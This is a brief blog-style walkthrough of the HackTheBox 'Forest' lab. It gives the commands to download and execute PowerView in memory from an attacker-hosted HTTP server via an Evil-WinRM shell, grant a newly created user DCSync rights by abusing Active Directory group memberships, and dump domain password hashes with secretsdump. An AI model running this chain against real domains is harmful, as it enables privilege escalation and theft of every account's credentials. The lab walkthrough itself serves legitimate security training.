scenario: solving hackthebox forest challenge.
say you already have remote evil winrm shell on the remote AD box. and you are connected with that box via vpn. say 10.10.10.161 is AD's ip and 10.10.14.2 is your ip.
now you need you upload some files in the AD box from your box. lets see how python server help in this regard.
git clone https://github.com/PowerShellMafia/PowerSploit/ -b dev
now go to cd PowerSploit/Recon to get PowerView.ps1
root@ippsec:~/htb/boxes/forest/www# in this directory we have put PowerView.ps1 tool.
root@ippsec:~/htb/boxes/forest/www# python3 -m http.server 80
now go to AD box via winrm shell: using user svc-alfresco
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> IEX(New-Object Net.WebClient).downloadString('http://10.10.14.2/PowerView.ps1')
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $pass = convertto-securestring 'PleaseSub' -AsPlainText -Force
PleaseSub is the password of ippsec user that we created on AD using net user command and add that user to a special group in AD. The reason is if we add ippsec user on that group, then we can assign dcsync rights to that user in order to extract password hashes from AD. because doing bloodhound we have found that, there is a group on AD named account operators and svc-alfresco is a member of that group. the thing is account operator group allow a user say svc-alfresco to create other user and assign them to other group. leveraging this we have created ippsec user and add him exchange windows permissions group. once ippsec user in this group exchange windows permissions, then we can further assign him dcsync rights.
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $cred = New-Object System.Management.Automation.PSCredential('HTB\ippsec', $pass)
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipleIdentity ippsec -Rights DCSync
now come back to your host machine:
root@ippsec:/usr/share/doc/python3-impacket/examples# ./secretsdump.py htb.local/ippsec:PleaseSub@10.10.10.161
Avi
Comments
Post a Comment